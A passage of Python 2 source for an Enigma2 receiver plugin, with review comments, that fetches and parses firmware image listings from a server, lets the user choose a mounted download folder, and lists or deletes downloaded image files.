            self.groups = ['DM_7020HD']
            self.downloading = True
        if self.selectedservername == '</ mika (www.satelitin.com)':
            self.groups = ['Golden_Intestar_Xpeed_LX_Class_S2', 'VuPlus_Uno4K', 'VuPlus_Zero4K']
            self.downloading = True
        # NOTE(review): self.groups is only assigned for the names above; an
        # unknown server name would make ListToMulticontent raise.
        self['actions'] = ActionMap(['SetupActions', 'ColorActions'], {'ok': self.okClicked,
         'green': self.okClicked,
         'red': self.close,
         'cancel': self.close}, -2)
        self.ListToMulticontent()
        return

    def ListToMulticontent(self):
        """Fill the 'list' MenuList with one row per model group; FHD
        displays get taller rows and a larger font."""
        res = []
        theevents = []
        self.events = []
        self.events = self.groups
        if dwidth == 1280:
            self['list'].l.setItemHeight(34)
            self['list'].l.setFont(0, gFont('Sansation-Bold', 30))
            for i in range(0, len(self.events)):
                # First, empty entry acts as a 2px spacer column.
                res.append(MultiContentEntryText(pos=(0, 5), size=(2, 34), font=0, flags=RT_HALIGN_LEFT, text=''))
                res.append(MultiContentEntryText(pos=(30, 2), size=(740, 34), font=0, flags=RT_HALIGN_LEFT, text=self.events[i]))
                theevents.append(res)
                res = []
        else:
            self['list'].l.setItemHeight(50)
            self['list'].l.setFont(0, gFont('Sansation-Bold', 40))
            for i in range(0, len(self.events)):
                res.append(MultiContentEntryText(pos=(0, 5), size=(2, 50), font=0, flags=RT_HALIGN_LEFT, text=''))
                res.append(MultiContentEntryText(pos=(30, 2), size=(740, 50), font=0, flags=RT_HALIGN_LEFT, text=self.events[i]))
                theevents.append(res)
                res = []
        self['list'].l.setList(theevents)

    def okClicked(self):
        # Open the Images screen for the highlighted model group.
        cindex = self['list'].getSelectionIndex()
        selection = str(self.groups[cindex])
        self.session.open(Images, self.selectedservername, self.searchstr, selection, self.rooturl)
class Images(Screen):
    """Third screen: fetches the directory listing of the selected model
    group from the server, lists the image archives and opens the
    SelectLocation download dialog when one is chosen."""

    def __init__(self, session, selectedservername, searchstr, selection, rooturl):
        self.session = session
        # Pick the HD or FHD skin variant based on the detected display width.
        if dwidth == 1280:
            skin = '/usr/lib/enigma2/python/Plugins/Extensions/SatVenusPanel/Skin/imagesHD.xml'
        else:
            skin = '/usr/lib/enigma2/python/Plugins/Extensions/SatVenusPanel/Skin/imagesFHD.xml'
        f = open(skin, 'r')
        self.skin = f.read()
        f.close()
        Screen.__init__(self, session)
        self.rooturl = rooturl
        self.data = []
        self.selection = selection
        self.selectedservername = selectedservername
        # Listing URL is <server root>/<model group>.  NOTE(review): the
        # trailing + '' is a no-op left over from an earlier suffix.
        self.url = self.rooturl + self.selection + ''
        self['ButtonRedtext'] = Label(_('Exit'))
        self['ButtonGreentext'] = Label(_('Please select ...'))
        self['info'] = Label(_('Getting the list, please wait ...'))
        self['menu'] = MenuList([], True, eListboxPythonMultiContent)
        list = []
        self.list = list
        self.status = []
        self.slist = []
        self['actions'] = ActionMap(['SetupActions', 'MenuActions', 'ColorActions'], {'ok': self.selclicked,
         'green': self.selclicked,
         'cancel': self.close}, -2)
        self.itempreview = False
        # Defer the blocking HTTP fetch until after the screen is shown;
        # newer enigma2 exposes timer.timeout.connect, older builds use the
        # timer.callback list instead.
        self.timer = eTimer()
        try:
            self.timer_conn = self.timer.timeout.connect(self.extractdata)
        except:
            self.timer.callback.append(self.extractdata)
        self.timer.start(100, 1)

    def extractdata(self):
        """Fetch and parse the server listing into self.data, then populate
        the menu.  All five known maintainers go through getdata(); the else
        branch (getplidata) would only run for other server names."""
        success = False
        if self.selectedservername == '</ zvonko67' or self.selectedservername == '</ mika (www.satelitin.com)' or self.selectedservername == '</ G_ogi' or self.selectedservername == '</ dragec11' or self.selectedservername == '</ jopidane':
            success, self.data = getdata(self.url)
            if success == True:
                pass
            else:
                self['info'].setText('Sorry, error in getting images list !')
                return
            if len(self.data) == 0:
                self['info'].setText('No images found !')
                return
        else:
            success, self.data = getplidata(self.url)
            if success == True:
                pass
            else:
                self['info'].setText('Sorry, error in getting images list !')
                return
            if len(self.data) == 0:
                self['info'].setText('No images found !')
                return
        self['info'].setText('Press OK to download selected image !')
        self.ListToMulticontent()

    def downloadxmlpage(self):
        """Asynchronously fetch the XML catalogue (twisted getPage)."""
        url = self.xmlurl
        getPage(url).addCallback(self._gotPageLoad).addErrback(self.errorLoad)

    def errorLoad(self, error):
        """getPage errback: report the failure on screen."""
        print str(error)
        self['info'].setText('Addons download failure, no internet connection or server down !')
        self.downloading = False

    def _gotPageLoad(self, data):
        """getPage callback: parse the XML catalogue and fill self.data with
        [name, '', '', size] rows for the selected model group."""
        # NOTE(review): both branches assign self.xml = data, so the
        # try/except is effectively a no-op; 'newdata' is unused.
        try:
            newdata = ''
            self.xml = data
        except:
            self.xml = data
        if self.xml:
            xmlstr = minidom.parseString(self.xml)
        else:
            self.downloading = False
            self['info'].setText('Addons download failure, no internet connection or server down !')
            return
        self.data1 = []
        self.names = []
        icount = 0
        list = []
        xmlparse = xmlstr
        self.xmlparse = xmlstr
        self.data = []
        print '688', self.selection
        for images in self.xmlparse.getElementsByTagName('images'):
            # Only <images cont="..."> groups matching the chosen model.
            if str(images.getAttribute('cont').encode('utf8')) == self.selection:
                for image in images.getElementsByTagName('image'):
                    item = image.getAttribute('name').encode('utf8')
                    urlserver = str(image.getElementsByTagName('url')[0].childNodes[0].data)
                    imagesize = 'image size ' + str(image.getElementsByTagName('imagesize')[0].childNodes[0].data)
                    timagesize = str(imagesize).replace('image size', '').strip()
                    print '675', str(timagesize)
                    urlserver = os.path.basename(urlserver)
                    self.data.append([urlserver,
                     '',
                     '',
                     timagesize])
        self.downloading = True
        if len(self.data) == 0:
            self['info'].setText('No images found !')
        # NOTE(review): the 'No images found !' text above is immediately
        # overwritten by the line below -- a 'return' is probably missing.
        self['info'].setText('Press OK to download selected image !')
        self.ListToMulticontent()

    def ListToMulticontent(self, result = None):
        """(Re)build the menu rows.  Each row shows a red button icon when
        the archive already exists in the download folder, green otherwise.
        Accepts an ignored *result* so it can serve as a dialog callback."""
        downloadpath = getDownloadPath()
        res = []
        theevents = []
        if dwidth == 1280:
            self['menu'].l.setItemHeight(80)
            self['menu'].l.setFont(0, gFont('Sansation-Bold', 22))
            self.menulist = []
            for i in range(0, len(self.data)):
                item = str(self.data[i][0])
                idate = str(self.data[i][1])
                itime = str(self.data[i][2])
                imagesize = str(self.data[i][3])
                print item
                if os.path.exists(downloadpath + item):
                    png = '/usr/lib/enigma2/python/Plugins/Extensions/SatVenusPanel/pics/button_red.png'
                else:
                    png = '/usr/lib/enigma2/python/Plugins/Extensions/SatVenusPanel/pics/button_green.png'
                res.append(MultiContentEntryText(pos=(0, 1), size=(5, 5), font=0, flags=RT_HALIGN_LEFT, text=''))
                res.append(MultiContentEntryPixmapAlphaTest(pos=(5, 25), size=(30, 30), png=loadPNG(png)))
                res.append(MultiContentEntryText(pos=(40, 20), size=(730, 25), font=0, flags=RT_HALIGN_LEFT, text=item))
                theevents.append(res)
                res = []
        else:
            self['menu'].l.setItemHeight(80)
            self['menu'].l.setFont(0, gFont('Sansation-Bold', 34))
            self.menulist = []
            for i in range(0, len(self.data)):
                item = str(self.data[i][0])
                idate = str(self.data[i][1])
                itime = str(self.data[i][2])
                imagesize = str(self.data[i][3])
                print item
                if os.path.exists(downloadpath + item):
                    png = '/usr/lib/enigma2/python/Plugins/Extensions/SatVenusPanel/pics/button_red.png'
                else:
                    png = '/usr/lib/enigma2/python/Plugins/Extensions/SatVenusPanel/pics/button_green.png'
                res.append(MultiContentEntryText(pos=(0, 1), size=(5, 40), font=0, flags=RT_HALIGN_LEFT, text=''))
                res.append(MultiContentEntryPixmapAlphaTest(pos=(5, 25), size=(30, 30), png=loadPNG(png)))
                res.append(MultiContentEntryText(pos=(40, 15), size=(900, 40), font=0, flags=RT_HALIGN_LEFT, text=item))
                theevents.append(res)
                res = []
        self.theevents = []
        self.theevents = theevents
        self['menu'].l.setList(theevents)
        self['menu'].show()

    def getfreespace(self):
        """Show the free space of the download location in the title.
        NOTE(review): freespace() returns a number -- confirm setTitle
        accepts a non-string argument on all enigma2 builds."""
        fspace = freespace()
        self.freespace = fspace
        self.setTitle(self.freespace)

    def selclicked(self):
        """OK/green handler: rebuild the group URL for the current server,
        derive the archive URL and open the SelectLocation dialog."""
        cindex = self['menu'].getSelectionIndex()
        if self.selectedservername == '</ zvonko67':
            self.url = 'http://178.63.156.75/BackUpImages/zvonko67/' + self.selection + '/'
        if self.selectedservername == '</ G_ogi':
            self.url = 'http://178.63.156.75/BackUpImages/G_ogi/' + self.selection + '/'
        if self.selectedservername == '</ mika (www.satelitin.com)':
            self.url = 'http://178.63.156.75/BackUpImages/mika/' + self.selection + '/'
        if self.selectedservername == '</ dragec11':
            self.url = 'http://178.63.156.75/BackUpImages/dragec11/' + self.selection + '/'
        if self.selectedservername == '</ jopidane':
            self.url = 'http://178.63.156.75/BackUpImages/jopidane/' + self.selection + '/'
        try:
            imageurl = self.url + self.data[cindex][0]
        except:
            imageurl = self.url
        imageurl = imageurl.strip()
        # URLs with spaces are rejected outright (they would need quoting).
        if ' ' in imageurl:
            self.session.open(ScreenBox, _('Sorry, the web address of image containing spaces, please report to the server maintainer to fix'), type=ScreenBox.TYPE_ERROR, timeout=5, close_on_any_key=True)
            return
        self.imagesize = self.data[cindex][3]
        if self.imagesize.strip() == '':
            imagesize = '0'
        else:
            imagesize = self.data[cindex][3].replace('M', '').strip()
        print '1190', imageurl
        self.session.openWithCallback(self.ListToMulticontent, SelectLocation, imageurl, imagesize)
######################
######################
import urllib2
import HTMLParser
import cStringIO
import datetime
import operator
class HTML2Text(HTMLParser.HTMLParser):
    """
    extract text from HTML code
    """

    def __init__(self):
        HTMLParser.HTMLParser.__init__(self)
        self.output = cStringIO.StringIO()

    def get_text(self):
        """Return the plain text accumulated so far."""
        return self.output.getvalue()

    def handle_starttag(self, tag, attrs):
        """Opening tags: only <br> matters -- it becomes a newline; every
        other tag is dropped from the output."""
        if tag == 'br':
            self.output.write('\n')

    def handle_endtag(self, tag):
        """Closing tags: a </p> also terminates the current line."""
        if tag == 'p':
            self.output.write('\n')

    def handle_data(self, data):
        """Character data between tags is copied through verbatim."""
        self.output.write(data)
def getnew(idate = None):
    """Return True when *idate* (a '%Y-%b-%d' formatted string) is less
    than 32 days old; a missing or unparseable date yields False."""
    try:
        today_str = datetime.datetime.now().strftime('%Y-%b-%d')
        given = datetime.datetime.strptime(idate, '%Y-%b-%d')
        today = datetime.datetime.strptime(str(today_str), '%Y-%b-%d')
        # Anything newer than ~a month counts as "new".
        return (today - given).days < 32
    except:
        # Broad on purpose: None, bad format, etc. all mean "not new".
        return False
def getdata(urlStr, searchstr = None):
    """Fetch an HTML directory listing from *urlStr*, extract the '.zip'
    rows and return ``(success, data)`` where each data row is
    ``[url, date, time, size]``, sorted newest-first.

    *searchstr* semantics:
      * None      -> every .zip line is kept
      * 'New'     -> only lines whose date getnew() accepts (< 32 days old)
      * other str -> only lines containing the string (case-insensitive)
    """
    data = []
    try:
        fileHandle = urllib2.urlopen(urlStr)
        html = fileHandle.read()
        fileHandle.close()
    except IOError:
        print 'Cannot open URL %s for reading' % urlStr
        return (False, data)
    try:
        # Strip markup; HTML2Text turns <br>/<p> into newlines so each
        # listing row lands on its own text line.
        p = HTML2Text()
        p.feed(html)
        text = p.get_text()
        raw_list = text.splitlines()
    except:
        return (False, data)
    textlist = []
    for line in raw_list:
        line = line.strip()
        print line
        if searchstr:
            if searchstr == 'New':
                if line != '' and '.zip' in line:
                    # Row shape: '<name>.zip <date> <time> ... <size>'.
                    # Split at '.zip' to separate the name from the metadata.
                    nfiparts = []
                    nfiparts = line.split('.zip')
                    url = nfiparts[0] + '.zip'
                    spart = nfiparts[1].strip()
                    sizdateparts = spart.split(' ')
                    idate = sizdateparts[0]
                    try:
                        itime = sizdateparts[1]
                    except:
                        print line
                        itime = ''
                    isize = sizdateparts[len(sizdateparts) - 1]
                    line = line + '\n'
                    idate = idate.strip()
                    print 'idate', idate
                    # NOTE(review): getnew() parses '%Y-%b-%d' while the
                    # strptime below uses '%d-%b-%Y' -- both cannot match the
                    # same server date format; confirm which one is right.
                    if getnew(idate):
                        try:
                            imdate = datetime.datetime.strptime(idate, '%d-%b-%Y')
                        except:
                            imdate = None
                        data.append([url,
                         imdate,
                         itime,
                         isize])
            elif line != '' and '.zip' in line and searchstr.lower() in line.lower():
                # Same parsing as above, without the freshness filter.
                nfiparts = []
                nfiparts = line.split('.zip')
                url = nfiparts[0] + '.zip'
                spart = nfiparts[1].strip()
                sizdateparts = spart.split(' ')
                idate = sizdateparts[0]
                try:
                    itime = sizdateparts[1]
                except:
                    print line
                    itime = ''
                isize = sizdateparts[len(sizdateparts) - 1]
                line = line + '\n'
                try:
                    imdate = datetime.datetime.strptime(idate, '%d-%b-%Y')
                except:
                    imdate = None
                data.append([url,
                 imdate,
                 itime,
                 isize])
        elif line != '' and '.zip' in line:
            # No search string: keep every .zip row.  Note the unparseable-
            # date fallback here is '' rather than None (as in the branches
            # above), which can make the sort below raise on mixed types.
            nfiparts = []
            nfiparts = line.split('.zip')
            url = nfiparts[0] + '.zip'
            spart = nfiparts[1].strip()
            sizdateparts = spart.split(' ')
            idate = sizdateparts[0]
            try:
                itime = sizdateparts[1]
            except:
                print line
                itime = ''
            isize = sizdateparts[len(sizdateparts) - 1]
            line = line + '\n'
            try:
                imdate = datetime.datetime.strptime(idate, '%d-%b-%Y')
            except:
                imdate = ''
            data.append([url,
             imdate,
             itime,
             isize])
    # Sort by parsed date (column 1) and reverse so the newest image is
    # first; mixed None/''/datetime values may make sort raise, in which
    # case the listing order is kept (and then reversed).
    try:
        data.sort(key=operator.itemgetter(1))
    except:
        pass
    data.reverse()
    return (True, data)
def getplidata(urlStr, searchstr = None):
    """Fetch an HTML directory listing from *urlStr* and return
    ``(success, data)`` with rows of ``[url, date, '', size]``.

    Variant of getdata() for listings where the metadata and the file name
    are separated by a newline (search mode) or a TAB (default mode)
    instead of sharing one space-separated line.
    """
    data = []
    print ' ', urlStr
    try:
        fileHandle = urllib2.urlopen(urlStr)
        html = fileHandle.read()
        fileHandle.close()
    except IOError:
        print 'Cannot open URL %s for reading' % urlStr
        return (False, data)
    try:
        p = HTML2Text()
        p.feed(html)
        text = p.get_text()
        raw_list = text.splitlines()
    except:
        return (False, data)
    data = []
    textlist = []
    for line in raw_list:
        line = line.strip()
        if searchstr:
            # NOTE(review): this compares against ' ' (single space) while
            # the default branch compares against ''; after strip() a line
            # can never equal ' ', so this sub-test is always true.
            if line != ' ' and '.zip' in line and searchstr.lower() in line.lower():
                # NOTE(review): splitlines() already removed newlines, so
                # split('\n') on a stripped line always yields one part and
                # only the x == 1 path below can run -- confirm intent.
                nfiparts = []
                nfiparts = line.split('\n')
                x = len(nfiparts)
                if x == 1:
                    # Name only: no metadata available on this line.
                    url = nfiparts[0]
                    idate = ''
                    itime = ''
                    isize = ''
                    data.append([url,
                     idate,
                     itime,
                     isize])
                    continue
                try:
                    url = nfiparts[1]
                except:
                    url = ''
                # Metadata part: first token is the date, last is the size.
                infoparts = nfiparts[0].split(' ')
                y = len(infoparts)
                try:
                    idate = infoparts[0]
                except:
                    idate = ''
                try:
                    isize = infoparts[y - 1]
                except:
                    isize = ''
                itime = ''
                data.append([url,
                 idate,
                 itime,
                 isize])
        elif line != '' and '.zip' in line:
            # Default mode: '<metadata>\t<name>.zip' rows.
            nfiparts = []
            nfiparts = line.split('\t')
            x = len(nfiparts)
            if x == 1:
                url = nfiparts[0]
                idate = ''
                itime = ''
                isize = ''
                data.append([url,
                 idate,
                 itime,
                 isize])
                continue
            try:
                url = nfiparts[1]
            except:
                url = ''
            infoparts = nfiparts[0].split(' ')
            y = len(infoparts)
            try:
                idate = infoparts[0]
            except:
                idate = ''
            try:
                isize = infoparts[y - 1]
            except:
                isize = ''
            itime = ''
            data.append([url,
             idate,
             itime,
             isize])
    print data
    return (True, data)
######################
######################
class SelectDownloadLocation(Screen, HelpableScreen):
    """File-browser screen used to pick (and persist into
    config.plugins.ImageDownLoader2.Downloadlocation) the download folder.
    Only mounted /media/* locations with enough free space are accepted."""

    def __init__(self, session, text = '', filename = '', currDir = None, location = None, userMode = False, minFree = None, autoAdd = False, editDir = False, inhibitDirs = [], inhibitMounts = []):
        # NOTE(review): mutable default arguments (inhibitDirs/inhibitMounts)
        # are shared across calls; harmless here since they are only read.
        self.session = session
        # Pick the HD or FHD skin variant based on the detected display width.
        if dwidth == 1280:
            skin = '/usr/lib/enigma2/python/Plugins/Extensions/SatVenusPanel/Skin/sellocHD.xml'
        else:
            skin = '/usr/lib/enigma2/python/Plugins/Extensions/SatVenusPanel/Skin/sellocFHD.xml'
        f = open(skin, 'r')
        self.skin = f.read()
        f.close()
        Screen.__init__(self, session)
        HelpableScreen.__init__(self)
        self['text'] = StaticText(_('Selected download location:'))
        self.text = text
        self.filename = filename
        self.minFree = minFree
        self.reallocation = location
        self.location = location and location.value[:] or []
        self.userMode = userMode
        self.autoAdd = autoAdd
        self.editDir = editDir
        self.inhibitDirs = inhibitDirs
        self.inhibitMounts = inhibitMounts
        # The caller-supplied inhibit lists are overridden with these
        # hard-coded system paths before the FileList is built.
        inhibitDirs = ['/bin',
         '/boot',
         '/dev',
         '/lib',
         '/proc',
         '/sbin',
         '/sys',
         '/mnt',
         '/var',
         '/home',
         '/tmp',
         '/etc',
         '/share',
         '/usr']
        inhibitMounts = ['/mnt', '/ba', '/MB_Images']
        self['filelist'] = FileList(currDir, showDirectories=True, showFiles=False, inhibitMounts=inhibitMounts, inhibitDirs=inhibitDirs)
        self['mountlist'] = MenuList(mountedDevs)
        self['ButtonGreentext'] = Label(_('SAVE'))
        self['ButtonRedtext'] = Label(_('Exit'))
        self['target'] = Label()
        self['actions'] = ActionMap(['SetupActions', 'ColorActions'], {'red': self.close,
         'cancel': self.close}, -2)
        if self.userMode:
            # NOTE(review): usermodeOn is not defined in this class; confirm
            # a base class provides it before enabling userMode.
            self.usermodeOn()

        class DownloadLocationActionMap(HelpableActionMap):
            """Plain HelpableActionMap subclass (kept local to this screen)."""

            def __init__(self, parent, context, actions = {}, prio = 0):
                HelpableActionMap.__init__(self, parent, context, actions, prio)

        self['WizardActions'] = DownloadLocationActionMap(self, 'WizardActions', {'left': self.left,
         'right': self.right,
         'up': self.up,
         'down': self.down,
         'ok': (self.ok, _('Select')),
         'back': (self.cancel, _('Cancel'))}, -2)
        self['ColorActions'] = DownloadLocationActionMap(self, 'ColorActions', {'red': self.cancel,
         'green': self.select}, -2)
        self.onLayoutFinish.append(self.switchToFileListOnStart)

    def switchToFileListOnStart(self):
        """After layout: focus the file list, pre-selecting the previously
        configured location when one is known."""
        if self.reallocation and self.reallocation.value:
            self.currList = 'filelist'
            currDir = self['filelist'].current_directory
            if currDir in self.location:
                self['filelist'].moveToIndex(self.location.index(currDir))
        else:
            self.switchToFileList()

    def switchToFileList(self):
        """Give focus to the file list (unless running in user mode)."""
        if not self.userMode:
            self.currList = 'filelist'
            self['filelist'].selectionEnabled(1)
            self.updateTarget()

    def up(self):
        self[self.currList].up()
        self.updateTarget()

    def down(self):
        self[self.currList].down()
        self.updateTarget()

    def left(self):
        self[self.currList].pageUp()
        self.updateTarget()

    def right(self):
        self[self.currList].pageDown()
        self.updateTarget()

    def ok(self):
        """Descend into the highlighted directory."""
        if self.currList == 'filelist':
            if self['filelist'].canDescent():
                self['filelist'].descent()
                self.updateTarget()

    def updateTarget(self):
        """Refresh the 'target' label with <folder><filename>."""
        currFolder = self.getPreferredFolder()
        if currFolder is not None:
            self['target'].setText(''.join((currFolder, self.filename)))
        else:
            self['target'].setText(_('Invalid Location'))
        return

    def cancel(self):
        self.close(None)
        return

    def getPreferredFolder(self):
        # Returns None implicitly when the file list does not have focus.
        if self.currList == 'filelist':
            return self['filelist'].getSelection()[0]

    def saveSelection(self, ret):
        """Confirmation callback: persist the chosen folder and close."""
        if ret:
            ret = ''.join((self.getPreferredFolder(), self.filename))
            config.plugins.ImageDownLoader2.Downloadlocation.value = ret
            config.plugins.ImageDownLoader2.Downloadlocation.save()
            config.plugins.ImageDownLoader2.save()
            config.save()
        self.close(None)
        return

    def checkmountDownloadPath(self, path):
        """Return True when *path* is under /media and listed in
        /proc/mounts; shows an error dialog and returns False otherwise."""
        if path is None:
            self.session.open(ScreenBox, _('nothing entered'), ScreenBox.TYPE_ERROR)
            return False
        else:
            sp = []
            sp = path.split('/')
            print sp
            if len(sp) > 1:
                if sp[1] != 'media':
                    # NOTE(review): mounted_string is concatenated here but
                    # used as a %-format string in SelectLocation -- confirm
                    # which form matches its definition.
                    self.session.open(ScreenBox, mounted_string + path, ScreenBox.TYPE_ERROR)
                    return False
            mounted = False
            self.swappable = False
            sp2 = []
            f = open('/proc/mounts', 'r')
            m = f.readline()
            while m and not mounted:
                # NOTE(review): 'is not -1' only works because CPython caches
                # small ints; this should be '!= -1'.
                if m.find('/%s/%s' % (sp[1], sp[2])) is not -1:
                    mounted = True
                    print m
                    sp2 = m.split(' ')
                    print sp2
                    if sp2[2].startswith('ext') or sp2[2].endswith('fat'):
                        print '[stFlash] swappable'
                        self.swappable = True
                m = f.readline()
            f.close()
            if not mounted:
                self.session.open(ScreenBox, mounted_string + str(path), ScreenBox.TYPE_ERROR)
                return False
            # Make the configured folder world-writable (0777) if it exists.
            if os.path.exists(config.plugins.ImageDownLoader2.Downloadlocation.value):
                try:
                    os.chmod(config.plugins.ImageDownLoader2.Downloadlocation.value, 511)
                except:
                    pass
            return True
        return

    def select(self):
        """Green button: validate the highlighted folder (mounted, minimum
        free space) and persist it, asking for confirmation when space
        cannot be verified as sufficient."""
        currentFolder = self.getPreferredFolder()
        foldermounted = self.checkmountDownloadPath(currentFolder)
        if foldermounted == True:
            pass
        else:
            return
        if currentFolder is not None:
            if self.minFree is not None:
                try:
                    s = os.statvfs(currentFolder)
                    # Free space expressed in 300 MB units (314572800 bytes),
                    # compared against minFree.
                    if s.f_bavail * s.f_bsize / 314572800 > self.minFree:
                        return self.saveSelection(True)
                except OSError:
                    pass
                self.session.openWithCallback(self.saveSelection, ScreenBox, _('There might not be enough Space on the selected Partition.\nDo you really want to continue?'), type=ScreenBox.TYPE_YESNO)
            else:
                self.saveSelection(True)
        return
class DownloadedFiles(Screen):
    """Screen listing the .zip/.nfi images already present in the download
    folder, with a green-button delete action."""

    def __init__(self, session):
        self.session = session
        # Pick the HD or FHD skin variant based on the detected display width.
        if dwidth == 1280:
            skin = '/usr/lib/enigma2/python/Plugins/Extensions/SatVenusPanel/Skin/dlfilesHD.xml'
        else:
            skin = '/usr/lib/enigma2/python/Plugins/Extensions/SatVenusPanel/Skin/dlfilesFHD.xml'
        f = open(skin, 'r')
        self.skin = f.read()
        f.close()
        Screen.__init__(self, session)
        list = []
        self['menu'] = MenuList([], True, eListboxPythonMultiContent)
        self['ButtonRedtext'] = Label(_('Back '))
        self['ButtonGreentext'] = Label(_(' '))
        folder = str(config.plugins.ImageDownLoader2.Downloadlocation.value)
        fspace = str(freespace()) + 'MB'
        self['menu'].onSelectionChanged.append(self.selectionChanged)
        self['info'] = Label(folder + '\n' + ' Free space: ' + fspace)
        # Normalise the folder to always end in '/'.
        if folder.endswith('/'):
            self.folder = folder
        else:
            self.folder = folder + '/'
        self['actions'] = ActionMap(['SetupActions', 'ColorActions'], {'green': self.delimage,
         'cancel': self.close}, -2)
        self.fillplgfolders()

    def selectionChanged(self):
        """Toggle the green-button label depending on whether the current
        entry is a deletable image file."""
        try:
            fname = self['menu'].getCurrent()
            cindex = self['menu'].getSelectionIndex()
            filename = self.nfifiles[cindex][0]
            if filename.endswith(".zip") or filename.endswith('.nfi'):
                self['ButtonGreentext'].setText('Delete Image')
            else:
                self['ButtonGreentext'].setText(' ')
        except:
            # Empty list / stale index: leave the label untouched.
            pass

    def delimage(self):
        """Green button: ask for confirmation before deleting the image."""
        fname = self['menu'].getCurrent()
        cindex = self['menu'].getSelectionIndex()
        filename = self.folder + self.nfifiles[cindex][0]
        if filename.endswith(".zip") or filename.endswith('.nfi'):
            self['ButtonGreentext'].setText('Delete Image')
            self.session.openWithCallback(self.removefile, ScreenBox, _(filename + '\nwill Be Removed,\nAre You Sure ?'), ScreenBox.TYPE_YESNO)
        else:
            self['ButtonGreentext'].setText(' ')

    def removefile(self, result):
        """Confirmation callback: delete the file and refresh the list."""
        if result:
            try:
                fname = self['menu'].getCurrent()
                cindex = self['menu'].getSelectionIndex()
                filename = self.folder + self.nfifiles[cindex][0]
                remove(filename)
                self.fillplgfolders()
            except:
                self.session.open(ScreenBox, _('Sorry, unable to delete file!'), type=ScreenBox.TYPE_ERROR, timeout=5, close_on_any_key=True)

    def fillplgfolders(self):
        """Scan the download folder for .nfi/.zip files, recording each as
        [name, size-in-MB], then rebuild the menu."""
        try:
            self.nfifiles = []
            for x in listdir(self.folder):
                if os.path.isfile(self.folder + x):
                    if x.endswith('.nfi') or x.endswith('.zip'):
                        msize = os.path.getsize(self.folder + x)
                        localimagesize = str(round(float(msize / 1048576.0), 2))
                        self.nfifiles.append([x, localimagesize])
            self.ListToMulticontent()
        except:
            self.session.open(ScreenBox, _('Sorry, unable to show files, check ' + self.folder + ' is available and mounted!'), type=ScreenBox.TYPE_ERROR, timeout=5, close_on_any_key=True)

    def ListToMulticontent(self):
        """Build one row per file showing name and size; FHD displays get
        taller rows and a larger font."""
        res = []
        theevents = []
        self.events = []
        self.events = self.nfifiles
        if dwidth == 1280:
            self['menu'].l.setItemHeight(40)
            self['menu'].l.setFont(0, gFont('Sansation-Bold', 25))
            for i in range(0, len(self.events)):
                mfile = self.events[i][0]
                msize = self.events[i][1] + 'MB'
                res.append(MultiContentEntryText(pos=(0, 5), size=(2, 35), font=0, flags=RT_HALIGN_LEFT, text=''))
                res.append(MultiContentEntryText(pos=(10, 5), size=(650, 35), font=0, flags=RT_HALIGN_LEFT, text=mfile))
                res.append(MultiContentEntryText(pos=(660, 5), size=(150, 35), font=0, flags=RT_HALIGN_LEFT, text=msize))
                theevents.append(res)
                res = []
        else:
            self['menu'].l.setItemHeight(45)
            self['menu'].l.setFont(0, gFont('Sansation-Bold', 35))
            for i in range(0, len(self.events)):
                mfile = self.events[i][0]
                msize = self.events[i][1] + 'MB'
                res.append(MultiContentEntryText(pos=(0, 5), size=(2, 40), font=0, flags=RT_HALIGN_LEFT, text=''))
                res.append(MultiContentEntryText(pos=(10, 5), size=(650, 40), font=0, flags=RT_HALIGN_LEFT, text=mfile))
                res.append(MultiContentEntryText(pos=(660, 5), size=(150, 40), font=0, flags=RT_HALIGN_LEFT, text=msize))
                theevents.append(res)
                res = []
        self['menu'].l.setList(theevents)
        self['menu'].show()
class SelectLocation(Screen):
    """Pre-download menu for a chosen image: start the download, change the
    download location, or browse already-downloaded images."""

    def __init__(self, session, imageurl = None, imagesize = None):
        self.session = session
        # Pick the HD or FHD skin variant based on the detected display width.
        if dwidth == 1280:
            skin = '/usr/lib/enigma2/python/Plugins/Extensions/SatVenusPanel/Skin/izberiHD.xml'
        else:
            skin = '/usr/lib/enigma2/python/Plugins/Extensions/SatVenusPanel/Skin/izberiFHD.xml'
        f = open(skin, 'r')
        self.skin = f.read()
        f.close()
        Screen.__init__(self, session)
        self.menu = 0
        self.imagesize = imagesize
        self.imageurl = imageurl
        self.list = []
        self.oktext = _('')
        self.text = ''
        self['ButtonRedtext'] = Label(_('Exit'))
        self['ButtonGreentext'] = Label(_('Please select ...'))
        # Entry ids here must match the currentEntry checks in go().
        if self.menu == 0:
            self.list.append(('Download', _('Start Download'), None))
            self.list.append(('Downloadlocation', _('Choose Download Location'), None))
            self.list.append(('files', _('View Downloaded Images'), None))
        self['menu'] = List(self.list)
        self['status'] = StaticText('')
        self['targettext'] = StaticText(_('Selected Download Location:'))
        fname = os.path.basename(self.imageurl)
        # DreamElite URLs carry the real file name after the second '='.
        if 'DreamEliteImages' in fname:
            a = []
            a = fname.split('=')
            fname = a[2]
        self['downloadtext'] = StaticText(_('Selected image to download:\n' + fname))
        fspace = str(freespace()) + 'MB'
        self['target'] = Label(config.plugins.ImageDownLoader2.Downloadlocation.value + '\nFree space: ' + fspace)
        self['shortcuts'] = ActionMap(['ShortcutActions', 'WizardActions', 'InfobarEPGActions'], {'ok': self.go,
         'back': self.cancel,
         'red': self.cancel}, -1)
        self.onLayoutFinish.append(self.layoutFinished)
        return

    def layoutFinished(self):
        # Pre-select the first menu entry ('Download').
        idx = 0
        self['menu'].index = idx

    def fnameexists(self):
        """Return True when the target file already exists locally."""
        path = getDownloadPath()
        filename = path + os.path.basename(self.imageurl)
        if fileExists(filename):
            return True
        else:
            return False

    def callMyMsg(self, result):
        """Download-confirmation callback: validate the location and start
        the Downloader screen (FlashExpander boxes are refused)."""
        path = getDownloadPath()
        if self.checkmountDownloadPath(path) == False:
            return
        if result:
            if fileExists('/etc/init.d/flashexpander.sh'):
                self.session.open(ScreenBox, _('FlashExpander is used,no Image DownLoad possible.'), ScreenBox.TYPE_INFO)
                self.cancel()
            else:
                # NOTE(review): runDownload is assigned but never used here.
                runDownload = True
                self.localfile = path + os.path.basename(self.imageurl)
                self.session.openWithCallback(self.cancel, Downloader, self.imageurl, self.localfile, path)

    def callMyMsg2(self, result):
        """Alternative confirmation callback: download via the telnet/console
        helper screen instead of the GUI Downloader."""
        path = config.plugins.ImageDownLoader2.Downloadlocation.value
        if self.checkmountDownloadPath(path) == False:
            return
        if result:
            if fileExists('/etc/init.d/flashexpander.sh'):
                self.session.open(ScreenBox, _('FlashExpander is used,no Image DownLoad possible.'), ScreenBox.TYPE_INFO)
                self.cancel()
            else:
                runDownload = True
